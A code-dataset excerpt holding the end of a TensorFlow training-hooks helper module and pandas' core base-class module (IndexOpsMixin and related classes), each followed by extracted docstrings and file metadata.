**kwargs: a dictionary of arguments to LoggingTensorHook.
Returns:
Returns a LoggingTensorHook with a standard set of tensors that will be
printed to stdout.
"""
if tensors_to_log is None:
tensors_to_log = _TENSORS_TO_LOG
return tf.train.LoggingTensorHook(
tensors=tensors_to_log,
every_n_iter=every_n_iter)
def get_profiler_hook(model_dir, save_steps=1000, **kwargs): # pylint: disable=unused-argument
"""Function to get ProfilerHook.
Args:
model_dir: The directory to save the profile traces to.
save_steps: `int`, print profile traces every N steps.
**kwargs: a dictionary of arguments to ProfilerHook.
Returns:
Returns a ProfilerHook that writes out timelines that can be loaded into
profiling tools like chrome://tracing.
"""
return tf.train.ProfilerHook(save_steps=save_steps, output_dir=model_dir)
def get_examples_per_second_hook(every_n_steps=100,
batch_size=128,
warm_steps=5,
**kwargs): # pylint: disable=unused-argument
"""Function to get ExamplesPerSecondHook.
Args:
every_n_steps: `int`, print current and average examples per second every
N steps.
batch_size: `int`, total batch size used to calculate examples/second from
global time.
warm_steps: skip this number of steps before logging and running average.
**kwargs: a dictionary of arguments to ExamplesPerSecondHook.
Returns:
Returns a ProfilerHook that writes out timelines that can be loaded into
profiling tools like chrome://tracing.
"""
return hooks.ExamplesPerSecondHook(
batch_size=batch_size, every_n_steps=every_n_steps,
warm_steps=warm_steps, metric_logger=logger.get_benchmark_logger())
def get_logging_metric_hook(tensors_to_log=None,
every_n_secs=600,
**kwargs): # pylint: disable=unused-argument
"""Function to get LoggingMetricHook.
Args:
tensors_to_log: List of tensor names or dictionary mapping labels to tensor
names. If not set, log _TENSORS_TO_LOG by default.
every_n_secs: `int`, the frequency for logging the metric. Default to every
10 mins.
Returns:
Returns a LoggingMetricHook that saves tensor values in a JSON format.
"""
if tensors_to_log is None:
tensors_to_log = _TENSORS_TO_LOG
return metric_hook.LoggingMetricHook(
tensors=tensors_to_log,
metric_logger=logger.get_benchmark_logger(),
every_n_secs=every_n_secs)
# A dictionary to map one hook name and its corresponding function
HOOKS = {
'loggingtensorhook': get_logging_tensor_hook,
'profilerhook': get_profiler_hook,
'examplespersecondhook': get_examples_per_second_hook,
'loggingmetrichook': get_logging_metric_hook,
}
| official/utils/logs/hooks_helper.py | 6,219 | Function to get ExamplesPerSecondHook.
Args:
every_n_steps: `int`, print current and average examples per second every
N steps.
batch_size: `int`, total batch size used to calculate examples/second from
global time.
warm_steps: skip this number of steps before logging and running average.
**kwargs: a dictionary of arguments to ExamplesPerSecondHook.
Returns:
Returns a ProfilerHook that writes out timelines that can be loaded into
profiling tools like chrome://tracing.
Function to get LoggingMetricHook.
Args:
tensors_to_log: List of tensor names or dictionary mapping labels to tensor
names. If not set, log _TENSORS_TO_LOG by default.
every_n_secs: `int`, the frequency for logging the metric. Default to every
10 mins.
Returns:
Returns a LoggingMetricHook that saves tensor values in a JSON format.
Function to get LoggingTensorHook.
Args:
every_n_iter: `int`, print the values of `tensors` once every N local
steps taken on the current worker.
tensors_to_log: List of tensor names or dictionary mapping labels to tensor
names. If not set, log _TENSORS_TO_LOG by default.
**kwargs: a dictionary of arguments to LoggingTensorHook.
Returns:
Returns a LoggingTensorHook with a standard set of tensors that will be
printed to stdout.
Function to get ProfilerHook.
Args:
model_dir: The directory to save the profile traces to.
save_steps: `int`, print profile traces every N steps.
**kwargs: a dictionary of arguments to ProfilerHook.
Returns:
Returns a ProfilerHook that writes out timelines that can be loaded into
profiling tools like chrome://tracing.
Factory for getting a list of TensorFlow hooks for training by name.
Args:
name_list: a list of strings to name desired hook classes. Allowed:
LoggingTensorHook, ProfilerHook, ExamplesPerSecondHook, which are defined
as keys in HOOKS
use_tpu: Boolean of whether computation occurs on a TPU. This will disable
hooks altogether.
**kwargs: a dictionary of arguments to the hooks.
Returns:
list of instantiated hooks, ready to be used in a classifier.train call.
Raises:
ValueError: if an unrecognized name is passed.
Hooks helper to return a list of TensorFlow hooks for training by name.
More hooks can be added to this set. To add a new hook, 1) add the new hook to
the registry in HOOKS, 2) add a corresponding function that parses out necessary
parameters.
This code is adapted from the https://github.com/tensorflow/models/tree/master/official/r1/resnet. ========================================================================================== NAVER’s modifications are Copyright 2020 NAVER corp. All rights reserved. ========================================================================================== Copyright 2017 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ============================================================================== pylint: disable=g-bad-import-order pylint: disable=unused-argument pylint: disable=unused-argument pylint: disable=unused-argument pylint: disable=unused-argument A dictionary to map one hook name and its corresponding function | 3,657 | en | 0.721628 |
"""
Base and utility classes for pandas objects.
"""
from __future__ import annotations
import textwrap
from typing import (
TYPE_CHECKING,
Any,
Generic,
Hashable,
Literal,
TypeVar,
cast,
final,
)
import numpy as np
import pandas._libs.lib as lib
from pandas._typing import (
ArrayLike,
DtypeObj,
FrameOrSeries,
IndexLabel,
Shape,
npt,
)
from pandas.compat import PYPY
from pandas.compat.numpy import function as nv
from pandas.errors import AbstractMethodError
from pandas.util._decorators import (
cache_readonly,
doc,
)
from pandas.core.dtypes.common import (
is_categorical_dtype,
is_dict_like,
is_extension_array_dtype,
is_object_dtype,
is_scalar,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCIndex,
ABCSeries,
)
from pandas.core.dtypes.missing import (
isna,
remove_na_arraylike,
)
from pandas.core import (
algorithms,
ops,
)
from pandas.core.accessor import DirNamesMixin
from pandas.core.algorithms import (
duplicated,
unique1d,
value_counts,
)
from pandas.core.arraylike import OpsMixin
from pandas.core.arrays import ExtensionArray
from pandas.core.construction import (
create_series_with_explicit_dtype,
ensure_wrapped_if_datetimelike,
extract_array,
)
import pandas.core.nanops as nanops
if TYPE_CHECKING:
from pandas._typing import (
NumpySorter,
NumpyValueArrayLike,
)
from pandas import Categorical
_shared_docs: dict[str, str] = {}
_indexops_doc_kwargs = {
"klass": "IndexOpsMixin",
"inplace": "",
"unique": "IndexOpsMixin",
"duplicated": "IndexOpsMixin",
}
_T = TypeVar("_T", bound="IndexOpsMixin")
class PandasObject(DirNamesMixin):
"""
Baseclass for various pandas objects.
"""
# results from calls to methods decorated with cache_readonly get added to _cache
_cache: dict[str, Any]
@property
def _constructor(self):
"""
Class constructor (for this class it's just `__class__`.
"""
return type(self)
def __repr__(self) -> str:
"""
Return a string representation for a particular object.
"""
# Should be overwritten by base classes
return object.__repr__(self)
def _reset_cache(self, key: str | None = None) -> None:
"""
Reset cached properties. If ``key`` is passed, only clears that key.
"""
if not hasattr(self, "_cache"):
return
if key is None:
self._cache.clear()
else:
self._cache.pop(key, None)
def __sizeof__(self) -> int:
"""
Generates the total memory usage for an object that returns
either a value or Series of values
"""
memory_usage = getattr(self, "memory_usage", None)
if memory_usage:
mem = memory_usage(deep=True)
return int(mem if is_scalar(mem) else mem.sum())
# no memory_usage attribute, so fall back to object's 'sizeof'
return super().__sizeof__()
class NoNewAttributesMixin:
"""
Mixin which prevents adding new attributes.
Prevents additional attributes via xxx.attribute = "something" after a
call to `self.__freeze()`. Mainly used to prevent the user from using
wrong attributes on an accessor (`Series.cat/.str/.dt`).
If you really want to add a new attribute at a later time, you need to use
`object.__setattr__(self, key, value)`.
"""
def _freeze(self):
"""
Prevents setting additional attributes.
"""
object.__setattr__(self, "__frozen", True)
# prevent adding any attribute via s.xxx.new_attribute = ...
def __setattr__(self, key: str, value):
# _cache is used by a decorator
# We need to check both 1.) cls.__dict__ and 2.) getattr(self, key)
# because
# 1.) getattr is false for attributes that raise errors
# 2.) cls.__dict__ doesn't traverse into base classes
if getattr(self, "__frozen", False) and not (
key == "_cache"
or key in type(self).__dict__
or getattr(self, key, None) is not None
):
raise AttributeError(f"You cannot add any new attribute '{key}'")
object.__setattr__(self, key, value)
class DataError(Exception):
pass
class SpecificationError(Exception):
pass
class SelectionMixin(Generic[FrameOrSeries]):
"""
mixin implementing the selection & aggregation interface on a group-like
object sub-classes need to define: obj, exclusions
"""
obj: FrameOrSeries
_selection: IndexLabel | None = None
exclusions: frozenset[Hashable]
_internal_names = ["_cache", "__setstate__"]
_internal_names_set = set(_internal_names)
@final
@property
def _selection_list(self):
if not isinstance(
self._selection, (list, tuple, ABCSeries, ABCIndex, np.ndarray)
):
return [self._selection]
return self._selection
@cache_readonly
def _selected_obj(self):
if self._selection is None or isinstance(self.obj, ABCSeries):
return self.obj
else:
return self.obj[self._selection]
@final
@cache_readonly
def ndim(self) -> int:
return self._selected_obj.ndim
@final
@cache_readonly
def _obj_with_exclusions(self):
if self._selection is not None and isinstance(self.obj, ABCDataFrame):
return self.obj[self._selection_list]
if len(self.exclusions) > 0:
# equivalent to `self.obj.drop(self.exclusions, axis=1)
# but this avoids consolidating and making a copy
return self.obj._drop_axis(
self.exclusions, axis=1, consolidate=False, only_slice=True
)
else:
return self.obj
def __getitem__(self, key):
if self._selection is not None:
raise IndexError(f"Column(s) {self._selection} already selected")
if isinstance(key, (list, tuple, ABCSeries, ABCIndex, np.ndarray)):
if len(self.obj.columns.intersection(key)) != len(key):
bad_keys = list(set(key).difference(self.obj.columns))
raise KeyError(f"Columns not found: {str(bad_keys)[1:-1]}")
return self._gotitem(list(key), ndim=2)
elif not getattr(self, "as_index", False):
if key not in self.obj.columns:
raise KeyError(f"Column not found: {key}")
return self._gotitem(key, ndim=2)
else:
if key not in self.obj:
raise KeyError(f"Column not found: {key}")
subset = self.obj[key]
ndim = subset.ndim
return self._gotitem(key, ndim=ndim, subset=subset)
def _gotitem(self, key, ndim: int, subset=None):
"""
sub-classes to define
return a sliced object
Parameters
----------
key : str / list of selections
ndim : {1, 2}
requested ndim of result
subset : object, default None
subset to act on
"""
raise AbstractMethodError(self)
def aggregate(self, func, *args, **kwargs):
raise AbstractMethodError(self)
agg = aggregate
class IndexOpsMixin(OpsMixin):
"""
Common ops mixin to support a unified interface / docs for Series / Index
"""
# ndarray compatibility
__array_priority__ = 1000
_hidden_attrs: frozenset[str] = frozenset(
["tolist"] # tolist is not deprecated, just suppressed in the __dir__
)
@property
def dtype(self) -> DtypeObj:
# must be defined here as a property for mypy
raise AbstractMethodError(self)
@property
def _values(self) -> ExtensionArray | np.ndarray:
# must be defined here as a property for mypy
raise AbstractMethodError(self)
def transpose(self: _T, *args, **kwargs) -> _T:
"""
Return the transpose, which is by definition self.
Returns
-------
%(klass)s
"""
nv.validate_transpose(args, kwargs)
return self
T = property(
transpose,
doc="""
Return the transpose, which is by definition self.
""",
)
@property
def shape(self) -> Shape:
"""
Return a tuple of the shape of the underlying data.
"""
return self._values.shape
def __len__(self) -> int:
# We need this defined here for mypy
raise AbstractMethodError(self)
@property
def ndim(self) -> int:
"""
Number of dimensions of the underlying data, by definition 1.
"""
return 1
def item(self):
"""
Return the first element of the underlying data as a Python scalar.
Returns
-------
scalar
The first element of %(klass)s.
Raises
------
ValueError
If the data is not length-1.
"""
if len(self) == 1:
return next(iter(self))
raise ValueError("can only convert an array of size 1 to a Python scalar")
@property
def nbytes(self) -> int:
"""
Return the number of bytes in the underlying data.
"""
return self._values.nbytes
@property
def size(self) -> int:
"""
Return the number of elements in the underlying data.
"""
return len(self._values)
@property
def array(self) -> ExtensionArray:
"""
The ExtensionArray of the data backing this Series or Index.
Returns
-------
ExtensionArray
An ExtensionArray of the values stored within. For extension
types, this is the actual array. For NumPy native types, this
is a thin (no copy) wrapper around :class:`numpy.ndarray`.
``.array`` differs ``.values`` which may require converting the
data to a different form.
See Also
--------
Index.to_numpy : Similar method that always returns a NumPy array.
Series.to_numpy : Similar method that always returns a NumPy array.
Notes
-----
This table lays out the different array types for each extension
dtype within pandas.
================== =============================
dtype array type
================== =============================
category Categorical
period PeriodArray
interval IntervalArray
IntegerNA IntegerArray
string StringArray
boolean BooleanArray
datetime64[ns, tz] DatetimeArray
================== =============================
For any 3rd-party extension types, the array type will be an
ExtensionArray.
For all remaining dtypes ``.array`` will be a
:class:`arrays.NumpyExtensionArray` wrapping the actual ndarray
stored within. If you absolutely need a NumPy array (possibly with
copying / coercing data), then use :meth:`Series.to_numpy` instead.
Examples
--------
For regular NumPy types like int, and float, a PandasArray
is returned.
>>> pd.Series([1, 2, 3]).array
<PandasArray>
[1, 2, 3]
Length: 3, dtype: int64
For extension types, like Categorical, the actual ExtensionArray
is returned
>>> ser = pd.Series(pd.Categorical(['a', 'b', 'a']))
>>> ser.array
['a', 'b', 'a']
Categories (2, object): ['a', 'b']
"""
raise AbstractMethodError(self)
def to_numpy(
self,
dtype: npt.DTypeLike | None = None,
copy: bool = False,
na_value=lib.no_default,
**kwargs,
) -> np.ndarray:
"""
A NumPy ndarray representing the values in this Series or Index.
Parameters
----------
dtype : str or numpy.dtype, optional
The dtype to pass to :meth:`numpy.asarray`.
copy : bool, default False
Whether to ensure that the returned value is not a view on
another array. Note that ``copy=False`` does not *ensure* that
``to_numpy()`` is no-copy. Rather, ``copy=True`` ensure that
a copy is made, even if not strictly necessary.
na_value : Any, optional
The value to use for missing values. The default value depends
on `dtype` and the type of the array.
.. versionadded:: 1.0.0
**kwargs
Additional keywords passed through to the ``to_numpy`` method
of the underlying array (for extension arrays).
.. versionadded:: 1.0.0
Returns
-------
numpy.ndarray
See Also
--------
Series.array : Get the actual data stored within.
Index.array : Get the actual data stored within.
DataFrame.to_numpy : Similar method for DataFrame.
Notes
-----
The returned array will be the same up to equality (values equal
in `self` will be equal in the returned array; likewise for values
that are not equal). When `self` contains an ExtensionArray, the
dtype may be different. For example, for a category-dtype Series,
``to_numpy()`` will return a NumPy array and the categorical dtype
will be lost.
For NumPy dtypes, this will be a reference to the actual data stored
in this Series or Index (assuming ``copy=False``). Modifying the result
in place will modify the data stored in the Series or Index (not that
we recommend doing that).
For extension types, ``to_numpy()`` *may* require copying data and
coercing the result to a NumPy type (possibly object), which may be
expensive. When you need a no-copy reference to the underlying data,
:attr:`Series.array` should be used instead.
This table lays out the different dtypes and default return types of
``to_numpy()`` for various dtypes within pandas.
================== ================================
dtype array type
================== ================================
category[T] ndarray[T] (same dtype as input)
period ndarray[object] (Periods)
interval ndarray[object] (Intervals)
IntegerNA ndarray[object]
datetime64[ns] datetime64[ns]
datetime64[ns, tz] ndarray[object] (Timestamps)
================== ================================
Examples
--------
>>> ser = pd.Series(pd.Categorical(['a', 'b', 'a']))
>>> ser.to_numpy()
array(['a', 'b', 'a'], dtype=object)
Specify the `dtype` to control how datetime-aware data is represented.
Use ``dtype=object`` to return an ndarray of pandas :class:`Timestamp`
objects, each with the correct ``tz``.
>>> ser = pd.Series(pd.date_range('2000', periods=2, tz="CET"))
>>> ser.to_numpy(dtype=object)
array([Timestamp('2000-01-01 00:00:00+0100', tz='CET'),
Timestamp('2000-01-02 00:00:00+0100', tz='CET')],
dtype=object)
Or ``dtype='datetime64[ns]'`` to return an ndarray of native
datetime64 values. The values are converted to UTC and the timezone
info is dropped.
>>> ser.to_numpy(dtype="datetime64[ns]")
... # doctest: +ELLIPSIS
array(['1999-12-31T23:00:00.000000000', '2000-01-01T23:00:00...'],
dtype='datetime64[ns]')
"""
if is_extension_array_dtype(self.dtype):
# error: Too many arguments for "to_numpy" of "ExtensionArray"
return self.array.to_numpy( # type: ignore[call-arg]
dtype, copy=copy, na_value=na_value, **kwargs
)
elif kwargs:
bad_keys = list(kwargs.keys())[0]
raise TypeError(
f"to_numpy() got an unexpected keyword argument '{bad_keys}'"
)
result = np.asarray(self._values, dtype=dtype)
# TODO(GH-24345): Avoid potential double copy
if copy or na_value is not lib.no_default:
result = result.copy()
if na_value is not lib.no_default:
result[self.isna()] = na_value
return result
@property
def empty(self) -> bool:
return not self.size
def max(self, axis=None, skipna: bool = True, *args, **kwargs):
"""
Return the maximum value of the Index.
Parameters
----------
axis : int, optional
For compatibility with NumPy. Only 0 or None are allowed.
skipna : bool, default True
Exclude NA/null values when showing the result.
*args, **kwargs
Additional arguments and keywords for compatibility with NumPy.
Returns
-------
scalar
Maximum value.
See Also
--------
Index.min : Return the minimum value in an Index.
Series.max : Return the maximum value in a Series.
DataFrame.max : Return the maximum values in a DataFrame.
Examples
--------
>>> idx = pd.Index([3, 2, 1])
>>> idx.max()
3
>>> idx = pd.Index(['c', 'b', 'a'])
>>> idx.max()
'c'
For a MultiIndex, the maximum is determined lexicographically.
>>> idx = pd.MultiIndex.from_product([('a', 'b'), (2, 1)])
>>> idx.max()
('b', 2)
"""
nv.validate_minmax_axis(axis)
nv.validate_max(args, kwargs)
return nanops.nanmax(self._values, skipna=skipna)
@doc(op="max", oppose="min", value="largest")
def argmax(self, axis=None, skipna: bool = True, *args, **kwargs) -> int:
"""
Return int position of the {value} value in the Series.
If the {op}imum is achieved in multiple locations,
the first row position is returned.
Parameters
----------
axis : {{None}}
Dummy argument for consistency with Series.
skipna : bool, default True
Exclude NA/null values when showing the result.
*args, **kwargs
Additional arguments and keywords for compatibility with NumPy.
Returns
-------
int
Row position of the {op}imum value.
See Also
--------
Series.arg{op} : Return position of the {op}imum value.
Series.arg{oppose} : Return position of the {oppose}imum value.
numpy.ndarray.arg{op} : Equivalent method for numpy arrays.
Series.idxmax : Return index label of the maximum values.
Series.idxmin : Return index label of the minimum values.
Examples
--------
Consider dataset containing cereal calories
>>> s = pd.Series({{'Corn Flakes': 100.0, 'Almond Delight': 110.0,
... 'Cinnamon Toast Crunch': 120.0, 'Cocoa Puff': 110.0}})
>>> s
Corn Flakes 100.0
Almond Delight 110.0
Cinnamon Toast Crunch 120.0
Cocoa Puff 110.0
dtype: float64
>>> s.argmax()
2
>>> s.argmin()
0
The maximum cereal calories is the third element and
the minimum cereal calories is the first element,
since series is zero-indexed.
"""
delegate = self._values
nv.validate_minmax_axis(axis)
skipna = nv.validate_argmax_with_skipna(skipna, args, kwargs)
if isinstance(delegate, ExtensionArray):
if not skipna and delegate.isna().any():
return -1
else:
return delegate.argmax()
else:
# error: Incompatible return value type (got "Union[int, ndarray]", expected
# "int")
return nanops.nanargmax( # type: ignore[return-value]
delegate, skipna=skipna
)
def min(self, axis=None, skipna: bool = True, *args, **kwargs):
"""
Return the minimum value of the Index.
Parameters
----------
axis : {None}
Dummy argument for consistency with Series.
skipna : bool, default True
Exclude NA/null values when showing the result.
*args, **kwargs
Additional arguments and keywords for compatibility with NumPy.
Returns
-------
scalar
Minimum value.
See Also
--------
Index.max : Return the maximum value of the object.
Series.min : Return the minimum value in a Series.
DataFrame.min : Return the minimum values in a DataFrame.
Examples
--------
>>> idx = pd.Index([3, 2, 1])
>>> idx.min()
1
>>> idx = pd.Index(['c', 'b', 'a'])
>>> idx.min()
'a'
For a MultiIndex, the minimum is determined lexicographically.
>>> idx = pd.MultiIndex.from_product([('a', 'b'), (2, 1)])
>>> idx.min()
('a', 1)
"""
nv.validate_minmax_axis(axis)
nv.validate_min(args, kwargs)
return nanops.nanmin(self._values, skipna=skipna)
@doc(argmax, op="min", oppose="max", value="smallest")
def argmin(self, axis=None, skipna=True, *args, **kwargs) -> int:
delegate = self._values
nv.validate_minmax_axis(axis)
skipna = nv.validate_argmin_with_skipna(skipna, args, kwargs)
if isinstance(delegate, ExtensionArray):
if not skipna and delegate.isna().any():
return -1
else:
return delegate.argmin()
else:
# error: Incompatible return value type (got "Union[int, ndarray]", expected
# "int")
return nanops.nanargmin( # type: ignore[return-value]
delegate, skipna=skipna
)
def tolist(self):
"""
Return a list of the values.
These are each a scalar type, which is a Python scalar
(for str, int, float) or a pandas scalar
(for Timestamp/Timedelta/Interval/Period)
Returns
-------
list
See Also
--------
numpy.ndarray.tolist : Return the array as an a.ndim-levels deep
nested list of Python scalars.
"""
if not isinstance(self._values, np.ndarray):
# check for ndarray instead of dtype to catch DTA/TDA
return list(self._values)
return self._values.tolist()
to_list = tolist
def __iter__(self):
"""
Return an iterator of the values.
These are each a scalar type, which is a Python scalar
(for str, int, float) or a pandas scalar
(for Timestamp/Timedelta/Interval/Period)
Returns
-------
iterator
"""
# We are explicitly making element iterators.
if not isinstance(self._values, np.ndarray):
# Check type instead of dtype to catch DTA/TDA
return iter(self._values)
else:
return map(self._values.item, range(self._values.size))
@cache_readonly
def hasnans(self) -> bool:
"""
Return if I have any nans; enables various perf speedups.
"""
return bool(isna(self).any())
def isna(self):
return isna(self._values)
def _reduce(
self,
op,
name: str,
*,
axis=0,
skipna=True,
numeric_only=None,
filter_type=None,
**kwds,
):
"""
Perform the reduction type operation if we can.
"""
func = getattr(self, name, None)
if func is None:
raise TypeError(
f"{type(self).__name__} cannot perform the operation {name}"
)
return func(skipna=skipna, **kwds)
@final
def _map_values(self, mapper, na_action=None):
"""
An internal function that maps values using the input
correspondence (which can be a dict, Series, or function).
Parameters
----------
mapper : function, dict, or Series
The input correspondence object
na_action : {None, 'ignore'}
If 'ignore', propagate NA values, without passing them to the
mapping function
Returns
-------
Union[Index, MultiIndex], inferred
The output of the mapping function applied to the index.
If the function returns a tuple with more than one element
a MultiIndex will be returned.
"""
# we can fastpath dict/Series to an efficient map
# as we know that we are not going to have to yield
# python types
if is_dict_like(mapper):
if isinstance(mapper, dict) and hasattr(mapper, "__missing__"):
# If a dictionary subclass defines a default value method,
# convert mapper to a lookup function (GH #15999).
dict_with_default = mapper
mapper = lambda x: dict_with_default[x]
else:
# Dictionary does not have a default. Thus it's safe to
# convert to an Series for efficiency.
# we specify the keys here to handle the
# possibility that they are tuples
# The return value of mapping with an empty mapper is
# expected to be pd.Series(np.nan, ...). As np.nan is
# of dtype float64 the return value of this method should
# be float64 as well
mapper = create_series_with_explicit_dtype(
mapper, dtype_if_empty=np.float64
)
if isinstance(mapper, ABCSeries):
# Since values were input this means we came from either
# a dict or a series and mapper should be an index
if is_categorical_dtype(self.dtype):
# use the built in categorical series mapper which saves
# time by mapping the categories instead of all values
cat = cast("Categorical", self._values)
return cat.map(mapper)
values = self._values
indexer = mapper.index.get_indexer(values)
new_values = algorithms.take_nd(mapper._values, indexer)
return new_values
# we must convert to python types
if is_extension_array_dtype(self.dtype) and hasattr(self._values, "map"):
# GH#23179 some EAs do not have `map`
values = self._values
if na_action is not None:
raise NotImplementedError
map_f = lambda values, f: values.map(f)
else:
values = self._values.astype(object)
if na_action == "ignore":
map_f = lambda values, f: lib.map_infer_mask(
values, f, isna(values).view(np.uint8)
)
elif na_action is None:
map_f = lib.map_infer
else:
msg = (
"na_action must either be 'ignore' or None, "
f"{na_action} was passed"
)
raise ValueError(msg)
# mapper is a function
new_values = map_f(values, mapper)
return new_values
def value_counts(
self,
normalize: bool = False,
sort: bool = True,
ascending: bool = False,
bins=None,
dropna: bool = True,
):
"""
Return a Series containing counts of unique values.
The resulting object will be in descending order so that the
first element is the most frequently-occurring element.
Excludes NA values by default.
Parameters
----------
normalize : bool, default False
If True then the object returned will contain the relative
frequencies of the unique values.
sort : bool, default True
Sort by frequencies.
ascending : bool, default False
Sort in ascending order.
bins : int, optional
Rather than count values, group them into half-open bins,
a convenience for ``pd.cut``, only works with numeric data.
dropna : bool, default True
Don't include counts of NaN.
Returns
-------
Series
See Also
--------
Series.count: Number of non-NA elements in a Series.
DataFrame.count: Number of non-NA elements in a DataFrame.
DataFrame.value_counts: Equivalent method on DataFrames.
Examples
--------
>>> index = pd.Index([3, 1, 2, 3, 4, np.nan])
>>> index.value_counts()
3.0 2
1.0 1
2.0 1
4.0 1
dtype: int64
With `normalize` set to `True`, returns the relative frequency by
dividing all values by the sum of values.
>>> s = pd.Series([3, 1, 2, 3, 4, np.nan])
>>> s.value_counts(normalize=True)
3.0 0.4
1.0 0.2
2.0 0.2
4.0 0.2
dtype: float64
**bins**
Bins can be useful for going from a continuous variable to a
categorical variable; instead of counting unique
apparitions of values, divide the index in the specified
number of half-open bins.
>>> s.value_counts(bins=3)
(0.996, 2.0] 2
(2.0, 3.0] 2
(3.0, 4.0] 1
dtype: int64
**dropna**
With `dropna` set to `False` we can also see NaN index values.
>>> s.value_counts(dropna=False)
3.0 2
1.0 1
2.0 1
4.0 1
NaN 1
dtype: int64
"""
return value_counts(
self,
sort=sort,
ascending=ascending,
normalize=normalize,
bins=bins,
dropna=dropna,
)
def unique(self):
values = self._values
if not isinstance(values, np.ndarray):
result: ArrayLike = values.unique()
if self.dtype.kind in ["m", "M"] and isinstance(self, ABCSeries):
# GH#31182 Series._values returns EA, unpack for backward-compat
if getattr(self.dtype, "tz", None) is None:
result = np.asarray(result)
else:
result = unique1d(values)
return result
def nunique(self, dropna: bool = True) -> int:
"""
Return number of unique elements in the object.
Excludes NA values by default.
Parameters
----------
dropna : bool, default True
Don't include NaN in the count.
Returns
-------
int
See Also
--------
DataFrame.nunique: Method nunique for DataFrame.
Series.count: Count non-NA/null observations in the Series.
Examples
--------
>>> s = pd.Series([1, 3, 5, 7, 7])
>>> s
0 1
1 3
2 5
3 7
4 7
dtype: int64
>>> s.nunique()
4
"""
uniqs = self.unique()
if dropna:
uniqs = remove_na_arraylike(uniqs)
return len(uniqs)
@property
def is_unique(self) -> bool:
"""
Return boolean if values in the object are unique.
Returns
-------
bool
"""
return self.nunique(dropna=False) == len(self)
@property
def is_monotonic(self) -> bool:
"""
Return boolean if values in the object are
monotonic_increasing.
Returns
-------
bool
"""
from pandas import Index
return Index(self).is_monotonic
@property
def is_monotonic_increasing(self) -> bool:
"""
Alias for is_monotonic.
"""
# mypy complains if we alias directly
return self.is_monotonic
@property
def is_monotonic_decreasing(self) -> bool:
"""
Return boolean if values in the object are
monotonic_decreasing.
Returns
-------
bool
"""
from pandas import Index
return Index(self).is_monotonic_decreasing
def _memory_usage(self, deep: bool = False) -> int:
"""
Memory usage of the values.
Parameters
----------
deep : bool, default False
Introspect the data deeply, interrogate
`object` dtypes for system-level memory consumption.
Returns
-------
bytes used
See Also
--------
numpy.ndarray.nbytes : Total bytes consumed by the elements of the
array.
Notes
-----
Memory usage does not include memory consumed by elements that
are not components of the array if deep=False or if used on PyPy
"""
if hasattr(self.array, "memory_usage"):
# https://github.com/python/mypy/issues/1424
# error: "ExtensionArray" has no attribute "memory_usage"
return self.array.memory_usage(deep=deep) # type: ignore[attr-defined]
v = self.array.nbytes
if deep and is_object_dtype(self) and not PYPY:
values = cast(np.ndarray, self._values)
v += lib.memory_usage_of_objects(values)
return v
@doc(
algorithms.factorize,
values="",
order="",
size_hint="",
sort=textwrap.dedent(
"""\
sort : bool, default False
Sort `uniques` and shuffle `codes` to maintain the
relationship.
"""
),
)
def factorize(self, sort: bool = False, na_sentinel: int | None = -1):
return algorithms.factorize(self, sort=sort, na_sentinel=na_sentinel)
_shared_docs[
"searchsorted"
] = """
Find indices where elements should be inserted to maintain order.
Find the indices into a sorted {klass} `self` such that, if the
corresponding elements in `value` were inserted before the indices,
the order of `self` would be preserved.
.. note::
The {klass} *must* be monotonically sorted, otherwise
wrong locations will likely be returned. Pandas does *not*
check this for you.
Parameters
----------
value : array-like or scalar
Values to insert into `self`.
side : {{'left', 'right'}}, optional
If 'left', the index of the first suitable location found is given.
If 'right', return the last such index. If there is no suitable
index, return either 0 or N (where N is the length of `self`).
sorter : 1-D array-like, optional
Optional array of integer indices that sort `self` into ascending
order. They are typically the result of ``np.argsort``.
Returns
-------
int or array of int
A scalar or array of insertion points with the
same shape as `value`.
See Also
--------
sort_values : Sort by the values along either axis.
numpy.searchsorted : Similar method from NumPy.
Notes
-----
Binary search is used to find the required insertion points.
Examples
--------
>>> ser = pd.Series([1, 2, 3])
>>> ser
0 1
1 2
2 3
dtype: int64
>>> ser.searchsorted(4)
3
>>> ser.searchsorted([0, 4])
array([0, 3])
>>> ser.searchsorted([1, 3], side='left')
array([0, 2])
>>> ser.searchsorted([1, 3], side='right')
array([1, 3])
>>> ser = pd.Series(pd.to_datetime(['3/11/2000', '3/12/2000', '3/13/2000']))
>>> ser
0 2000-03-11
1 2000-03-12
2 2000-03-13
dtype: datetime64[ns]
>>> ser.searchsorted('3/14/2000')
3
>>> ser = pd.Categorical(
... ['apple', 'bread', 'bread', 'cheese', 'milk'], ordered=True
... )
>>> ser
['apple', 'bread', 'bread', 'cheese', 'milk']
Categories (4, object): ['apple' < 'bread' < 'cheese' < 'milk']
>>> ser.searchsorted('bread')
1
>>> ser.searchsorted(['bread'], side='right')
array([3])
If the values are not monotonically sorted, wrong locations
may be returned:
>>> ser = pd.Series([2, 1, 3])
>>> ser
0 2
1 1
2 3
dtype: int64
>>> ser.searchsorted(1) # doctest: +SKIP
0 # wrong result, correct would be 1
"""
@doc(_shared_docs["searchsorted"], klass="Index")
def searchsorted(
self,
value: NumpyValueArrayLike,
side: Literal["left", "right"] = "left",
sorter: NumpySorter = None,
) -> npt.NDArray[np.intp] | np.intp:
return algorithms.searchsorted(self._values, value, side=side, sorter=sorter)
def drop_duplicates(self, keep="first"):
duplicated = self._duplicated(keep=keep)
# error: Value of type "IndexOpsMixin" is not indexable
return self[~duplicated] # type: ignore[index]
@final
def _duplicated(
self, keep: Literal["first", "last", False] = "first"
) -> npt.NDArray[np.bool_]:
return duplicated(self._values, keep=keep)
def _arith_method(self, other, op):
res_name = ops.get_op_result_name(self, other)
lvalues = self._values
rvalues = extract_array(other, extract_numpy=True, extract_range=True)
rvalues = ops.maybe_prepare_scalar_for_op(rvalues, lvalues.shape)
rvalues = ensure_wrapped_if_datetimelike(rvalues)
with np.errstate(all="ignore"):
result = ops.arithmetic_op(lvalues, rvalues, op)
return self._construct_result(result, name=res_name)
def _construct_result(self, result, name):
"""
Construct an appropriately-wrapped result from the ArrayLike result
of an arithmetic-like operation.
"""
raise AbstractMethodError(self)
| pandas/core/base.py | 38,591 | Common ops mixin to support a unified interface / docs for Series / Index
